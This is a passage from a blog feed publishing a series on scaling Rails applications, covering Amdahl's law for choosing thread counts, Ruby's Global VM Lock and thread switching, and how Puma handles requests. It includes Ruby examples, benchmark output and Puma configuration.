about.</p><p>&lt;iframewidth=&quot;966&quot;height=&quot;604&quot;src=&quot;https://www.youtube.com/embed/2hYs2X6Fb1M?si=f-P_-pcwnotnyUKT&quot;title=&quot;Amdahl's Law&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p><em>Amdahl's law states that the theoretical speedup gained from parallelization isdirectly determined by the fraction of sequential code in the program.</em></p><p>Now, let's see how we can use Amdahl's law to determine the ideal number ofthreads.</p><p>The parallelizable portion in this case is the portion of the application thatspends time doing I/O. The non-parallelizable portion is the time spent by theapplication executing Ruby code. Remember that because of GVL, within a process,only one thread has access to CPU at any point of time.</p><p>Now we need to know what percentage of time our app spends doing I/O. This willbe the value <code>p</code> as per the video.</p><p>Later in this series, we'll show you how to calculate what percentage of thetime the Rails application is spending doing I/O. For this blog let's assumethat our application spends 37% of the time doing I/O i.e the value of <code>p</code> is<strong>0.37</strong>.</p><p>Let's calculate how much speedup we will get if we use one thread(n is 1). Nowlet's change n to 2 and get the speedup value. Similarly, we bump up n all theway to 15 and we record the speedup.</p><p>Now let's draw a graph between the overall speedup and the number of threads.</p><p><img src="/blog_images/2025/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency/speedup-vs-thread-count.png" alt="Speedup V/S Number of threads"></p><p>From the graph, it can be seen that the speedup increases as the number ofthreads increases, but the rate of increase diminishes as more threads areadded. This is because the serial portion remains constant and is unaffected bythe increase in threads.</p><table><thead><tr><th>Threads(N)</th><th>Speedup(S)</th><th>% Improvement from previous run</th></tr></thead><tbody><tr><td>1</td><td>1.000</td><td>-</td></tr><tr><td>2</td><td>1.227</td><td>22.7%</td></tr><tr><td>3</td><td>1.366</td><td>11.3%</td></tr><tr><td>4</td><td>1.456</td><td>6.6%</td></tr><tr><td>5</td><td>1.518</td><td>4.2%</td></tr><tr><td>6</td><td>1.562</td><td>2.9%</td></tr><tr><td>7</td><td>1.594</td><td>2.0%</td></tr><tr><td>8</td><td>1.619</td><td>1.6%</td></tr></tbody></table><p>By examining the graph we can observe that the speedup gain from increasingthreads seem significant up to 4 threads, after which the incremental gain inspeedup starts to plateau.</p><p>Remember that these are theoretical maximums based on Amdahl's law. In practice,we need to use fewer threads as adding more threads can cause an increase inmemory usage and GVL contention, thereby causing latency spikes.</p><p>It's obvious that if we add more threads then more requests can be handled byPuma concurrently. What it means is that requests will be waiting for lessertime at the load balancer layer as there are more Puma threads waiting to pickup the request for processing. But in part 1, we saw that just because we havemore threads, it doesn't mean things will move faster. More threads might causeother threads to wait for the GVL.</p><p>There is no point in accepting requests if our web server can't respond to itpromptly. Whereas, if the <code>max_threads</code> value is set to a lower value, requestswill queue up at the Load Balancer layer which is better than overwhelming theapplication server.</p><p>If more and more requests are waiting at the load balancer level, then therequest queue time will shoot up. The right way to solve this problem is to addmore Puma processes. It is advised to increase the capacity of the Puma serverby adding more processes rather than increasing the number of threads.</p><p><a href="https://gist.github.com/neerajsingh0101/35e5307fb197b08ac6a62aa725cafec6">Here</a>is a middleware that can be used to track the request queue time. This code istaken from<a href="https://github.com/judoscale/judoscale-ruby/blob/15a4e9bd59734defb76656b59cba067b60aed473/judoscale-ruby/lib/judoscale/request_metrics.rb">judoscale</a>.</p><p>Note that <strong>Request Queue Time</strong> is the time spent waiting before the request ispicked up for processing.</p><p>This middleware will only work if the load balancer is adding the<code>HTTP_REQUEST_START</code> header. Heroku automatically adds this header.</p><p>Now we need to use this middleware and for that open <code>config/application.rb</code>file and we need to add the following line.</p><pre><code class="language-ruby">config.middleware.use RequestQueueTimeMiddleware</code></pre><p><em>This was Part 3 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of theblog is not clear to you then please write to us at<a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>,<a href="https://twitter.com/bigbinary">Twitter</a> or<a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[GVL in Ruby and the impact of GVL in scaling Rails applications]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/gvl-in-ruby-and-its-impact-in-scaling-rails-applications"/>
      <updated>2025-04-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/gvl-in-ruby-and-its-impact-in-scaling-rails-applications</id>
      <content type="html"><![CDATA[<p><em>This is Part 2 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><p>Let's start from the basics. Let's see how a standard web application mostlybehaves.</p><h2>Web applications and CPU usage</h2><p>Code in a web application typically works like this.</p><ul><li>Do some data manipulation.</li><li>Make a few database calls.</li><li>Do more calculations.</li><li>Make some network calls.</li><li>Do more calculations.</li></ul><p>Visually, it'll look something like this.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/work-done-in-processing-web-request.png" alt="Three threads 1 process &amp; 2 cores"></p><p>CPU work includes operations like view rendering, string manipulation, any kindof business logic processing etc. In short, anything that involves Ruby codeexecution can be considered CPU work. For the rest of the work, like databasecalls, network call etc. CPU is idle. Another way of looking at when the CPU isworking and when it's idle is this picture.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/cpu-working-idle.png" alt="CPU sometimes working &amp; sometimes idle"></p><p>When a program is using CPU, then that portion of the code is called <strong>CPUbound</strong> and when program is not using CPU, then that portion of the code iscalled <strong>IO bound</strong>.</p><h3>CPU bound or IO bound</h3><p>Let us understand what <strong>CPU bound</strong> truly means. Consider the following pieceof code.</p><pre><code class="language-ruby">10.times do  Net::HTTP.get(URI.parse(&quot;https://bigbinary.com&quot;))end</code></pre><p>In the above code, we are hitting the BigBinary website 10 times sequentially.Running the above code takes time because making a network connection is atime-consuming process.</p><p>Let's assume the code above takes 10 seconds to finish. We want the code to runfaster. So we bought a better CPU for the server. Do you think now the code willrun faster?</p><p>It will not. That's because the above code is <strong>not</strong> CPU bound. CPU is not thelimiting factor in this case. This code is I/O bound.</p><p>A program is <strong>CPU bound</strong> if the program will run faster if the CPU werefaster.</p><p>A program is <strong>I/O bound</strong> if the program will run faster if the I/O operationswere faster.</p><p>Some of the examples of I/O bound operations are:</p><ul><li><strong>making database calls</strong>: reading data from tables, creating new tables etc.</li><li><strong>making network calls</strong>: reading data from a website, sending emails etc.</li><li><strong>dealing with file systems</strong>: reading files from the file system.</li></ul><p>Previously, we saw that our CPU was idle sometimes. Now we know that thetechnical term for that idleness is <strong>IO bound</strong> let's update the picture.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/cpu-bound-io-bound.png" alt="CPU bound and IO bound"></p><p>When a program is I/O bound, the CPU is not doing anything. We don't wantprecious CPU cycles to be wasted. So what can we do so that the CPU is fullyutilized?</p><p>So far we have been dealing with only one thread. We can increase the number ofthreads in the process. In this way, whenever the CPU is done executing CPUbound code of one thread and that thread is doing an I/O bound operation, thenthe CPU can switch and handle the work from another thread. This will ensurethat the CPU is efficiently utilized. We will look at how the switching betweenthreads works a bit later in the article.</p><h2>Concurrency vs Parallelism</h2><p>Concurrency and parallelism sound similar, and in your daily life, you cansubstitute one for another, and you will be fine. However, from the computerengineering point of view, there is a difference between work happeningconcurrently and work happening in parallel.</p><p>Imagine a person who has to respond to 100 emails and 100 Twitter messages. Theperson can reply to an email and then reply to a Twitter message, then do thesame all over again: reply to an email and reply to a Twitter message.</p><p>The boss will see the count of pending emails and Twitter messages go down from100 to 99 to 98. The boss might think that the work is happening in &quot;parallel.&quot;But that's not true.</p><p>Technically, the work is happeningconcurrently. For a system to be parallel, itshould have two or more actions executed simultaneously. In this case, at anygiven moment, the person was either responding to email or responding toTwitter.</p><p>Another way to look at it is that <strong>Concurrency is about dealing</strong> with lots ofthings at the same time. <strong>Parallelism is about doing</strong> lots of things at thesame time.</p><p>If you find it hard to remember which one is which then remember that<strong>concurrency</strong> starts with the word <strong>con</strong>. Concurrency is the <em>conman</em>. It'spretending to be doing things &quot;in parallel,&quot; but it's only doing thingsconcurrently.</p><h2>Understanding GVL in Ruby</h2><p>GVL (Global VM Lock) in Ruby is a mechanism that prevents multiple threads fromexecuting Ruby code simultaneously. The GVL acts like a traffic light in aone-lane bridge. Even if multiple cars (threads) want to cross the bridge at thesame time, the traffic light (GVL) allows only one car to pass at a time. Onlywhen one car has made it safely to the other end, the second car is allowed bythe traffic light(GVL) to start.</p><p>Ruby's memory management(like garbage collection) and some other parts of Rubyare not thread-safe. Hence, GVL ensures that only one thread runs Ruby code at atime to avoid any data corruption.</p><p>When a thread &quot;holds the GVL&quot;, it has exclusive access to modify the VMstructures.</p><p>It's important to note that GVL is there to protect how Ruby works and managesRuby's internal VM state. GVL is not there to protect our application code. It'sworth repeating. The presence of GVL doesn't mean that we can write our code ina thread unsafe manner and expect Ruby to take care of all threading issues inour code.</p><p>Ruby offers tools like <a href="https://ruby-doc.com/3.3.6/Thread/Mutex.html">Mutex</a> and<a href="https://github.com/ruby-concurrency/concurrent-ruby">concurrent-ruby</a> gem tomanage concurrent code. For example, the followingcode(<a href="https://www.youtube.com/watch?v=rI4XlFvMNEw&amp;t=575s">source</a>) is not threadsafe and the GVL will not protect our code from race conditions.</p><pre><code class="language-ruby">from = 100_000_000to = 050.times.map do  Thread.new do    while from &gt; 0      from -= 1      to += 1    end  endend.map(&amp;:join)puts &quot;to = #{to}&quot;</code></pre><p>When we run this code, we might expect the result to always equal 100,000,000since we're just moving numbers from <code>from</code> to <code>to</code>. However, if we run itmultiple times, we'll get different results.</p><p>This happens because multiple threads are trying to modify the same variables(from and to) simultaneously without any synchronization. This is called racecondition and it happens because the operation <code>to += 1</code> and <code>from -= 1</code> arenon-atomic at the CPU-level. In simpler terms operation <code>to += 1</code> can be writtenas three CPU-level operations.</p><ol><li>Read current value of <code>to</code>.</li><li>Add 1 to it.</li><li>Store the result back to <code>to</code>.</li></ol><p>To fix this race condition the above code can be re-written using a<a href="https://docs.ruby-lang.org/en/master/Thread/Mutex.html">Mutex</a>.</p><pre><code class="language-rb">from = 100_000_000to = 0lock = Mutex.new50.times.map do  Thread.new do    while from &gt; 0      lock.synchronize do        if from &gt; 0          from -= 1          to += 1        end      end    end  endend.map(&amp;:join)puts &quot;to = #{to}&quot;</code></pre><p>It's worth nothing that Ruby implementations like JRuby and TruffleRuby don'thave a GVL.</p><h2>GVL dictates how many processes we will need</h2><p>Let's say that we deploy the production app to AWS's EC2's <code>t2.medium</code> machine.This machine has 2 vCPU as we can see from this chart.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/t2-medium.png" alt="T2 medium"></p><p>Without going into CPU vs vCPU discussion, let's keep things simple and assumethat the AWS machine has two cores. So we have deployed our code on a machinewith two cores but we have only one process running in production. No worries.We have three threads. So three threads can share two cores. You would thinkthat something like this should be possible.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/puma-one-process-2-cores.png" alt="Three threads 1 process &amp; 2 cores"></p><p>But it's not possible. Ruby doesn't allow it.</p><p>Currently, it's not possible because Thread 1 and Thread 2 belong to the sameprocess. This is because of the <strong>Global VM Lock (GVL)</strong>.</p><p>The GVL ensures that only one thread can execute CPU bound code at a time withina single Ruby process. The important thing to note here is that this lock is<strong>only for the CPU bound code</strong> and <strong>only for the same process</strong>.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/gvl-lock.png" alt="Single Process Multi Core"></p><p>In the above case, all three threads can do DB operations in parallel. But twothreads of the same process can't be doing CPU operations in parallel.</p><p>We can see that &quot;Thread 1&quot; is using Core 1. Core 2 is available but &quot;Thread 2&quot;can't use Core 2. GVL won't allow it.</p><p>Again, let's revisit what GVL does. For the CPU bound code GVL will ensure thatonly one thread from a process can access CPU.</p><p>So now the question is how do we utilize Core 2. Well, the GVL is applied at aprocess level. Threads of the same process are not allowed to do CPU operationsin parallel. Hence, the solution is to have more processes.</p><p>To have two Puma processes we need to set the value of env variable<code>WEB_CONCURRENCY</code> to 2 and reboot Puma.</p><pre><code class="language-ruby">WEB_CONCURRENCY=2 bundle exec rails s</code></pre><p>Now we have two processes. Now both Core 1 and Core 2 are being utilized.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/gvl-two-process.png" alt="Multi Process Multi Core"></p><p>What if the machine has 5 cores. Do we need 5 processes?</p><p>Yes. In that case, we will need to have 5 processes to utilize all the cores.</p><p>Therefore for achieving maximum utilization, the rule of thumb is that thenumber of processes i.e <code>WEB_CONCURRENCY</code> should be set to the number of coresavailable in the machine.</p><h2>Thread switching</h2><p>Now let's see how switching between threads happens in a multi-threadedenvironment. Note that the number of threads is 2 in this case.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/thread1-thread2.png" alt="CPU bound and IO bound"></p><p>As we can see, the CPU switches between Thread 1 and Thread 2 whenever it'sidle. This is great. We don't waste CPU cycles now, as we saw in thesingle-threaded case. But the switching logic is much more nuanced than what isshown in the picture.</p><p>Ruby manages multiple threads at two levels: the operating system level and theRuby level. When we create threads in Ruby, they are &quot;native threads&quot; - meaningthey are real threads that the operating system (OS) can see and manage.</p><p>All operating systems have a component called the scheduler. In Linux, it'scalled the<a href="https://en.wikipedia.org/wiki/Completely_Fair_Scheduler">Completely Fair Scheduler</a>or CFS. This scheduler decides which thread gets to use the CPU and for howlong. However, Ruby adds its own layer of control through the Global VM Lock(GVL).</p><p>In Ruby a thread can execute CPU bound code only if it holds the GVL. The RubyVM makes sure that a thread can hold the GVL for up to 100 milliseconds. Afterthat the thread will be forced to release GVL to another thread if there isanother thread waiting to execute CPU bound code. This ensures that the waitingRuby threads are not<a href="https://en.wikipedia.org/wiki/Starvation_(computer_science)">starved</a>.</p><p>When a thread is executing CPU-bound code, it will continue until either:</p><ol><li>It completes its CPU-bound work.</li><li>It hits an I/O operation (which automatically releases the GVL).</li><li>It reaches the limit of 100ms.</li></ol><p>When a thread starts running, the Ruby VM uses a background timer thread at theVM level that checks every 10ms how long the current Ruby thread has beenrunning. If the thread has been running longer than the thread quantum (100ms bydefault), the Ruby VM takes back the GVL from the active thread and gives it tothe next thread waiting in the queue. When a thread gives up the GVL (eithervoluntarily or is forced to give up), the thread goes to the back of the queue.</p><p>The default thread quantum is 100ms and starting from Ruby 3.3, it can beconfigured using the <code>RUBY_THREAD_TIMESLICE</code> environment variable.<a href="https://bugs.ruby-lang.org/issues/20861">Here</a> is the link to the discussion.This environment variable allows fine-tuning of thread scheduling behavior - asmaller quantum means more frequent thread switches, while a larger quantummeans fewer switches.</p><p>Let's see what happens when we have two threads.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/multi-threaded.png" alt="CPU bound and IO bound"></p><ol><li>T1 completes quantum limit of 100ms and gives up the GVL to T2.</li><li>T2 completes 50ms of CPU work and voluntarily gives up the GVL to do I/O.</li><li>T1 completes 75 ms of CPU work and voluntarily gives the GVL to do I/O.</li><li>Both T1 and T2 are doing I/O and doesn't want the GVL.</li></ol><p>It means that Thread 2 would be a lot faster if it had more access to CPU. Tomake CPU instantly available, we can have lesser number of threads CPU has tohandle. But we need to play a balancing game. If the CPU is idle then we arepaying for the processing cost for no reason. If the CPU is extremely busy thenthat means requests will take longer to process.</p><h2>Thread switching can lead to misleading data</h2><p>Let's take a look at a simple code given below. This code is taken from<a href="https://byroot.github.io/ruby/performance/2025/01/23/the-mythical-io-bound-rails-app.html">a blog</a>by <a href="https://x.com/_byroot">Jean Boussier</a>.</p><pre><code>start = Time.nowdatabase_connection.execute(&quot;SELECT ...&quot;)query_duration = (Time.now - start) * 1000.0puts &quot;Query took: #{query_duration.round(2)}ms&quot;</code></pre><p>The code looks simple. If the result is say <code>Query took: 80ms</code> then you wouldthink that the query actually took <code>80ms</code>. But now we know two things</p><ul><li>Executing database query is an IO operation (IO bound)</li><li>Once the IO bound operation is done then the thread might not immediately gethold of the GVL to execute CPU bound code.</li></ul><p>Think about it. What if the query took only <code>10ms</code> and the rest of the <code>70ms</code>The thread was waiting for the CPU because of the GVL. The only way to knowwhich portion took how much time is by instrumenting the GVL.</p><h2>Visualizing the effect of the GVL</h2><p>To better understand the effect of multiple threads when it comes to Ruby'sperformance, let's do a quick test. We'll start with a <strong>cpu_intensive</strong> methodthat performs pure arithmetic operations in nested loops, creating a workloadthat is heavily CPU dependent.</p><p><a href="https://gist.github.com/neerajsingh0101/de84bf200fae4e2003205ed81fcd9d7f">Here</a>is the code.</p><p>Running this script produced the following output:</p><pre><code class="language-ruby">Running demonstrations with GVL tracing...Starting demo with 1 threads doing CPU-bound workTime elapsed: 7.4921 secondsStarting demo with 3 threads doing CPU-bound workTime elapsed: 7.8146 seconds</code></pre><p>From the output, we can see that for CPU-bound work, a single thread performedbetter. Why? Let's visualize the result with the help of the traces generated inthe above script using the <a href="https://github.com/ivoanjo/gvl-tracing">gvl-tracing</a>gem. The trace files can be visualized using<a href="https://ui.perfetto.dev/">Perfetto</a>, which provides a timeline view showing howthreads interact with the GVL.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/cpu-single-multi.png" alt="Single and multi threads CPU bound"></p><p>We can see above that in the case of CPU-bound work if we have a single threadthen it's not waiting for GVL. However, if we have three threads then eachthread is waiting for GVL multiple times.</p><h3>Understanding the advantage of multiple threads in mixed workloads</h3><p>Now let's look at mixed workloads in single-threaded and multi-threadedenvironment. We'll use a separate script with a <strong>mixed_workload</strong> method thatcombines CPU-bound work with I/O operations. We use <code>IO.select</code> with blockingbehavior to simulate I/O operations. This creates actual I/O blocking thatreleases the GVL and shows as &quot;waiting&quot; in the GVL trace, accuratelyrepresenting real-world I/O operations like database queries.</p><p><a href="https://gist.github.com/neerajsingh0101/af1eb90a79c7da429d4287528d7bb788">Here</a>is the code for the mixed workload test.</p><p>Running this script with 1 thread and 3 threads produced the following output:</p><pre><code class="language-ruby">Running demonstrations with GVL tracing...Starting demo with 1 thread doing Mixed I/O and CPU workTime elapsed: 9.32 secondsStarting demo with 3 threads doing Mixed I/O and CPU workTime elapsed: 6.1344 seconds</code></pre><p>The key advantage of multiple threads in mixed workloads lies in how the GVL ismanaged during I/O operations. When a thread encounters an I/O operation (like adatabase query, network call, or file read), it voluntarily releases the GVL.This is fundamentally different from CPU-bound work, where threads compete forthe GVL and one thread must wait for another to finish or reach the 100msquantum limit.</p><p>During I/O operations, the thread is essentially blocked waiting for an externalresource (database, network, disk). While waiting, the thread doesn't need theGVL because it's not executing Ruby code. This creates an opportunity for otherthreads to acquire the GVL and do useful CPU work. The result is that CPU cyclesthat would otherwise be wasted during I/O waits are now being utilizedproductively by other threads.</p><p>Let's visualize this with the single-threaded case first:</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/mixed-single.png" alt="Single thread mixed workload"></p><p>In the single-threaded case, the threads wait for I/O operations to complete.During these I/O waits, the CPU sits idle. The thread performs some CPU work,then waits for I/O, then does more CPU work, then waits for I/O again. Duringall the I/O wait periods, no productive work is happening. The CPU is availablebut there's no other thread to utilize it.</p><p>Now let's look at the multi-threaded case with three threads:</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/mixed-multi.png" alt="Multi threaded mixed workload"></p><p>When there are three threads, the situation changes a bit. Threads nowoccasionally spend time waiting for the GVL, but the overall throughput issignificantly better.</p><p>When Thread 1 releases the GVL to perform I/O, Thread 2 can immediately acquireit and start executing CPU-bound work. While Thread 2 is working, Thread 1 mightstill be waiting for its I/O operation to complete. Then when Thread 2 releasesthe GVL for its own I/O operation, Thread 3 can acquire it. This creates apipeline effect where threads are constantly handing off the GVL to each otherensuring that the CPU is almost always doing useful work.</p><p>The small amount of GVL contention we see in the multi-threaded case (threadswaiting for GVL) is more than compensated for by the elimination of idle CPUtime. Instead of the CPU sitting idle during I/O operations, other threads keepit busy.</p><p>This is why Rails applications with typical workloads (lots of database queries,API calls, and other I/O operations) benefit significantly from having multiplethreads.</p><h2>Why can't we increase the thread count to a really high value?</h2><p>In the previous section, we saw that increasing the number of threads can helpin utilizing the CPU better. So why can't we increase the number of threads to areally high value? Let us visualize it.</p><p>In the hope of increasing performance, let us bump up the number of threads inthe previous code snippet to <code>20</code> and see the gvl-tracing result.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/20-threads.png" alt="20 threads"></p><p>As we can see in the above picture, the amount of GVL contention is massivehere. Threads are waiting to get a hold of the GVL. Same will happen inside aPuma process if we increase the number of threads to a very high value. As weknow, each request is handled by a thread. GVL contention therefore, means thatthe requests keep waiting, thereby increasing latency.</p><h2>What's next</h2><p>In the coming blogs, we'll see how we can figure out the ideal value for<code>max_threads</code>, both theoretically and empirically, based on our application'sworkload.</p><p><em>This was Part 2 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of theblog is not clear to you then please write to us at<a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>,<a href="https://twitter.com/bigbinary">Twitter</a> or<a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding how Puma handles requests]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance"/>
      <updated>2025-04-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance</id>
      <content type="html"><![CDATA[<p><em>This is Part 1 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><p>If we do<code>rails new</code>to create a new Railsapplication,<a href="https://puma.io">Puma</a>will be the default web server. Let's startby explaining how Puma handles requests.</p><h2>How does Puma handle requests?</h2><p>Puma listens to incoming requests on a TCP socket. When a request comes in, thenthat request is queued up in the socket. The request is then picked up by a Pumaprocess. In Puma, a process is a separate OS process that runs an instance ofthe Rails application.</p><p><em>Note that Puma official documentation calls a Puma process a Puma worker. Sincethe term &quot;worker&quot; might confuse people with background workers like Sidekiq orSolidQueue, in this article, we have used the word Puma process at a few placesto remove any ambiguity</em>.</p><p>Now, let's look at how a request is processed by Puma step-by-step.</p><p><img src="/blog_images/2025/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance/puma-internals.png" alt="Puma internals"></p><ol><li><p>All the incoming connections are added to the socket backlog, which is an OSlevel queue that holds pending connections.</p></li><li><p>A separate thread (created by the<a href="https://msp-greg.github.io/puma/Puma/Reactor.html">Reactor</a> class) reads theconnection from the socket backlog. As the name suggests, this Reactor classimplements the<a href="https://en.wikipedia.org/wiki/Reactor_pattern">reactor pattern</a>. The reactorcan manage multiple connections at a time thanks to non-blocking I/O and anevent-driven architecture.</p></li><li><p>Once the incoming request is fully buffered in memory, the request is passedto the thread pool where the request resides in the <code>@todo</code> array.</p></li><li><p>A thread in the thread pool pulls a request from the <code>@todo</code> array andprocesses it. The thread calls the Rack application, which, in our case is aRails application, and generates a response.</p></li><li><p>The response is then sent back to the client via the same connection. Oncethis is complete, the thread is released back to the thread pool to handlethe next item from the <code>@todo</code> array.</p></li></ol><h2>Modes in Puma</h2><ol><li><p><strong>Single Mode</strong>: In single mode, only a single Puma process boots and doesnot have any additional child processes. It is suitable only for applicationswith low traffic.</p><p><img src="/blog_images/2025/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance/single-mode.png" alt="Single mode"></p></li><li><p><strong>Cluster Mode</strong>: In cluster mode, Puma boots up a master process, whichprepares the application and then invokes the<a href="https://en.wikipedia.org/wiki/Fork_(system_call)">fork()</a> system call tocreate one or more child processes. These processes are the ones that areresponsible for handling requests. The master process monitors and managesthese child processes.<img src="/blog_images/2025/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance/cluster-mode.png" alt="Cluster mode"></p></li></ol><h2>Default Puma configuration in a new Rails application</h2><p>When we create a new Rails 8 or higher application, the default Puma<code>config/puma.rb</code> will have the following code.</p><p><em>Please note that we are mentioning Rails 8 here because the Puma configurationis different in prior versions of Rails.</em></p><pre><code class="language-ruby">threads_count = ENV.fetch(&quot;RAILS_MAX_THREADS&quot;, 3)threads threads_count, threads_countrails_env = ENV.fetch(&quot;RAILS_ENV&quot;, &quot;development&quot;)environment rails_envcase rails_envwhen &quot;production&quot;  workers_count = Integer(ENV.fetch(&quot;WEB_CONCURRENCY&quot;, 1))  workers workers_count if workers_count &gt; 1  preload_app!when &quot;development&quot;  worker_timeout 3600end</code></pre><p>For a brand new Rails application, the env variables <code>RAILS_MAX_THREADS</code> and<code>WEB_CONCURRENCY</code> won't be set. This means <code>threads_count</code> will be set to 3 and<code>workers_count</code> will be 1.</p><p>Now let's look at the second line from the above mentioned code.</p><pre><code class="language-ruby">threads threads_count, threads_count</code></pre><p>In the above code, <code>threads</code> is a method to which we are passing two arguments.The default value of <code>threads_count</code> is 3. So effectively, we are calling method<code>threads</code> like this.</p><pre><code>threads(3, 3)</code></pre><p>The threads method in Puma takes two arguments: <code>min</code> and <code>max</code>. These argumentsspecify the minimum and maximum number of threads that each Puma process willuse to handle requests. In this case Puma will initialize 3 threads in thethread pool.</p><p>Now let's look at the following line from the above mentioned code.</p><pre><code class="language-ruby">workers workers_count if workers_count &gt; 1</code></pre><p>The value of <code>workers_count</code> in this case is <code>1</code>, so Puma will run in <strong>single</strong>mode. As mentioned earlier in Puma a worker is basically a process. It's notbackground job worker.</p><p>What we have seen is that if we don't specify <code>RAILS_MAX_THREADS</code> or<code>WEB_CONCURRENCY</code> then, by default, Puma will boot a single process and thatprocess will have three threads. In other words Rails will boot with the abilityto handle 3 requests concurrently.</p><p>This is the default value for Puma for Rails booting in development or inproduction mode - a single process with three threads.</p><h2>Configuring Puma's concurrency and parallelism</h2><p>When it comes to concurrency and parallelism in Puma, there are two primaryparameters we can configure: the number of threads each process will have andthe number of processes we need.</p><p>To figure out the right value for each of these parameters, we need to know howRuby works. Specifically, we need to know how GVL in Ruby works and how itimpacts the performance of Rails applications.</p><p>We also need to know what kind of Rails application it is. Is it a CPU intensiveapplication, IO intensive or somewhere in between.</p><p>Don't worry in the next blog, we will start from the basics and will discuss allthis and much more.</p><p><em>This was Part 1 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of theblog is not clear to you then please write to us at<a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>,<a href="https://twitter.com/bigbinary">Twitter</a> or<a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Scaling Rails Series]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/scaling-rails-series"/>
      <updated>2025-04-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/scaling-rails-series</id>
      <content type="html"><![CDATA[<p>Rails makes it pretty easy to get started with development. You don't even haveto set up your database. It comes with SQLite. Install Rails, and you start thedevelopment.</p><p>Same with deploying to production. You need to change your database. Other thanthat it comes with sane defaults. You don't really need to know what's<code>RAILS_MAX_THREADS</code> and what's <code>WEB_CONCURRENCY</code>. However, as your applicationstarts getting more traffic, you want to scale your application.</p><p>Over the last 13 years of consultancy at BigBinary, we have seen all types ofapplications.</p><p>We have seen Rails applications which are IO heavy like scraping websites. Thereare applications which are heavy on background jobs. Then there are flash salesites where there is no traffic one minute and the next minute there are tons oftraffic. Then there are ticketing sites.</p><p>Each application has its own challenges.</p><p>If an application is not properly tuned, then we can run into all kinds ofissues. You can run out of memory or database connections. In some cases, becauseof the wrong configuration, Sidekiq jobs were failing and these jobs continued toget enqueued which made the situation worse.</p><p>To solve all these types of issues, we need to know what's actuallyhappening. And that's what we will do. We will look at under the hood to see howRails works, how Puma works, how connection pooling works, how to tune Sidekiqand how to measure what we need to know to make decisions.</p><p>It's a journey to understand from the ground up how to scale Rails applications.This page will have links to all the future blogs. You can follow the ScalingRails series by joining the newsletter or following us on<a href="https://twitter.com/bigbinary">twitter</a> or<a href="https://www.linkedin.com/company/bigbinary/">LinkedIn</a>. We even have an<a href="https://bigbinary.com/blog/feed.xml">RSS feed</a>.</p><h3><a href="/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance">Part 1 - Understanding how Puma handles requests</a></h3><ul><li>How Puma handles requests</li><li>Default Puma configuration in a new Rails application</li></ul><h3><a href="/blog/gvl-in-ruby-and-its-impact-in-scaling-rails-applications">Part 2 - GVL in Ruby and the impact of GVL in scaling Rails applications</a></h3><ul><li>Web applications and CPU usage</li><li>CPU bound or IO bound</li><li>Concurrency vs Parallelism</li><li>Understanding the GVL</li><li>GVL dictates how many processes you will need</li><li>Thread switching</li><li>Visualizing the effect of the GVL</li></ul><h3><a href="/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency">Part 3 - Amdahl's Law: The Theoretical Relationship Between Speedup and Concurrency</a></h3><ul><li>Amdahl's law</li><li>Relationship between speedup gained and the number of threads</li><li>Ideal number of threads in a process</li><li>Request queue time</li></ul><h3><a href="/blog/tuning-puma-max-threads-configuration-with-gvl-instrumentation">Part 4 - Finding ideal number of threads per process using GVL Instrumentation</a></h3><ul><li>GVL instrumentation using perfm</li><li>Determining the I/O workload of an application using the GVL data</li><li>Empirically determining the ideal number of Puma threads for an application</li></ul><h3><a href="/blog/understanding-active-record-connection-pooling">Part 5 - Understanding Active Record Connection Pooling</a></h3><ul><li>Database connection pooling</li><li>Active Record connection pool implementation</li><li>Connection pool configuration options</li><li>Active Record connection pool reaper</li><li>How many database connections will the web and background processes utilize 